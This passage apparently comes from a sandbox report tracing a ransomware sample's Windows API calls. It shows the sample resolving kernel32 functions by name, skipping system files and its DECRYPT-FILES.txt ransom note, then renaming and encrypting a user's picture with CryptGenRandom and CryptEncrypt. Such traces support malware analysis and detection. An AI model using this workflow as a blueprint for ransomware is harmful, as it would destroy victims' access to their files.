lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0086.038] lstrlenA (lpString="CREATEPIPE") returned 10 [0086.038] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0086.038] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0086.038] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0086.038] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0086.038] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0086.038] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0086.038] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0086.038] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0086.038] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0086.038] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0086.038] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0086.038] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0086.038] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0086.039] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0086.039] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0086.039] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0086.039] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0086.039] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0086.039] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0086.039] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0086.039] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0086.039] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0086.039] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0086.039] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0086.039] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0086.039] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0086.039] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0086.039] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0086.039] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0086.039] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0086.039] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0086.039] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0086.039] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0086.039] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0086.039] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0086.039] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0086.039] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0086.039] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0086.039] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0086.039] lstrlenA (lpString="CREATETHREAD") returned 12 [0086.039] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0086.039] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0086.039] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0086.039] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0086.039] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0086.039] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0086.039] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0086.039] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0086.039] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0086.039] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0086.040] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0086.040] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0086.040] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0086.040] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0086.040] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0086.040] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0086.040] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0086.040] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0086.040] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0086.040] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0086.040] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0086.040] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0086.040] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0086.040] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0086.040] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0086.040] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0086.040] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0086.040] lstrlenA (lpString="CTRLROUTINE") returned 11 [0086.040] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0086.040] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0086.040] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0086.040] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0086.040] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0086.040] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0086.040] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0086.040] lstrlenA (lpString="DEBUGBREAK") returned 10 [0086.040] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0086.040] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0086.040] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0086.040] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0086.040] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0086.040] lstrlenA (lpString="DECODEPOINTER") returned 13 [0086.040] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0086.040] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0086.040] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0086.040] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0086.040] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0086.041] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0086.041] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0086.041] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0086.041] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0086.041] lstrlenA (lpString="DELETEATOM") returned 10 [0086.041] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0086.041] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0086.041] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0086.041] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0086.041] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0086.041] lstrlenA (lpString="DELETEFIBER") returned 11 [0086.041] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0086.041] lstrlenA (lpString="DELETEFILEA") returned 11 [0086.041] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0086.041] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0086.041] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0086.041] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0086.041] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0086.041] lstrlenA (lpString="DELETEFILEW") returned 11 [0086.041] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0086.041] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0086.041] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0086.041] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0086.041] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0086.041] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0086.041] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0086.041] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0086.041] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0086.041] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0086.041] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0086.041] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0086.041] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0086.041] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0086.041] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0086.041] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0086.041] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0086.041] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0086.042] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0086.042] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0086.042] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0086.042] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0086.042] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0086.042] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0086.042] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0086.042] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0086.042] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0086.042] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0086.042] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0086.042] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0086.042] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0086.042] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0086.042] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0086.042] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0086.042] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0086.042] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0086.042] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0086.042] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0086.042] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0086.042] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0086.042] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0086.042] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0086.042] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0086.042] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0086.042] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0086.042] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0086.042] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0086.042] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0086.042] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0086.042] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0086.042] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0086.042] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0086.042] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0086.042] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0086.042] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0086.042] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0086.043] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0086.043] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0086.043] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0086.043] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0086.043] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0086.043] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0086.043] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0086.043] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0086.043] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0086.043] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0086.043] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0086.043] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0086.043] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7zLH.gif") returned 47 [0086.043] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7zLH.gif.ZKSng3g") returned 55 [0086.043] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7zLH.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\7zlh.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7zLH.gif.ZKSng3g" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\7zlh.gif.zksng3g"), dwFlags=0x0) returned 1 [0086.044] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.044] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.044] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.044] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x440f3790, ftCreationTime.dwHighDateTime=0x1d4cc8d, ftLastAccessTime.dwLowDateTime=0xcbfe6b30, ftLastAccessTime.dwHighDateTime=0x1d4c6ac, ftLastWriteTime.dwLowDateTime=0xcbfe6b30, ftLastWriteTime.dwHighDateTime=0x1d4c6ac, nFileSizeHigh=0x0, nFileSizeLow=0x102b8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BeweMui.bmp", cAlternateFileName="")) returned 1 [0086.044] lstrcmpiW (lpString1="BeweMui.bmp", lpString2="DECRYPT-FILES.txt") returned -1 [0086.045] lstrcmpiW (lpString1="BeweMui.bmp", lpString2="autorun.inf") returned 1 [0086.045] lstrcmpiW (lpString1="BeweMui.bmp", lpString2="boot.ini") returned -1 [0086.045] lstrcmpiW (lpString1="BeweMui.bmp", lpString2="desktop.ini") returned -1 [0086.045] lstrcmpiW (lpString1="BeweMui.bmp", lpString2="ntuser.dat") returned -1 [0086.045] lstrcmpiW (lpString1="BeweMui.bmp", lpString2="iconcache.db") returned -1 [0086.045] lstrcmpiW (lpString1="BeweMui.bmp", lpString2="bootsect.bak") returned -1 [0086.045] lstrcmpiW (lpString1="BeweMui.bmp", lpString2="ntuser.dat.log") returned -1 [0086.045] lstrcmpiW (lpString1="BeweMui.bmp", lpString2="thumbs.db") returned -1 [0086.045] lstrcmpiW (lpString1="BeweMui.bmp", lpString2="Bootfont.bin") returned -1 [0086.045] lstrlenW (lpString="BeweMui.bmp") returned 11 [0086.045] lstrcmpiW (lpString1="bmp", lpString2="lnk") returned -1 [0086.045] lstrcmpiW (lpString1="bmp", lpString2="exe") returned -1 [0086.045] lstrcmpiW (lpString1="bmp", lpString2="sys") returned -1 [0086.045] lstrcmpiW (lpString1="bmp", lpString2="dll") returned -1 [0086.045] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 39 [0086.045] lstrlenW (lpString="BeweMui.bmp") returned 11 [0086.045] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0086.045] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\", lpString2="BeweMui.bmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\BeweMui.bmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\BeweMui.bmp" [0086.045] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.045] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\BeweMui.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bewemui.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0086.045] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=66232) returned 1 [0086.045] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0086.046] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0086.046] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0086.047] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0086.047] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0086.047] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0086.048] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0086.049] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.049] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0086.050] CloseHandle (hObject=0x414) returned 1 [0086.050] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.050] WriteFile (in: hFile=0x410, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0086.051] CloseHandle (hObject=0x0) returned 0 [0086.051] CloseHandle (hObject=0x410) returned 1 [0086.051] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.051] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.051] GetTickCount () returned 0x114df77 [0086.051] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.052] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0086.052] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0086.052] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.052] lstrlenA (lpString="kernel32.dll") returned 12 [0086.052] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0086.052] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0086.052] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0086.052] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0086.052] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0086.052] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0086.052] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0086.052] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0086.052] lstrlenA (lpString="ADDATOMA") returned 8 [0086.052] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0086.052] lstrlenA (lpString="ADDATOMW") returned 8 [0086.053] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0086.053] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0086.053] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0086.053] lstrlenA 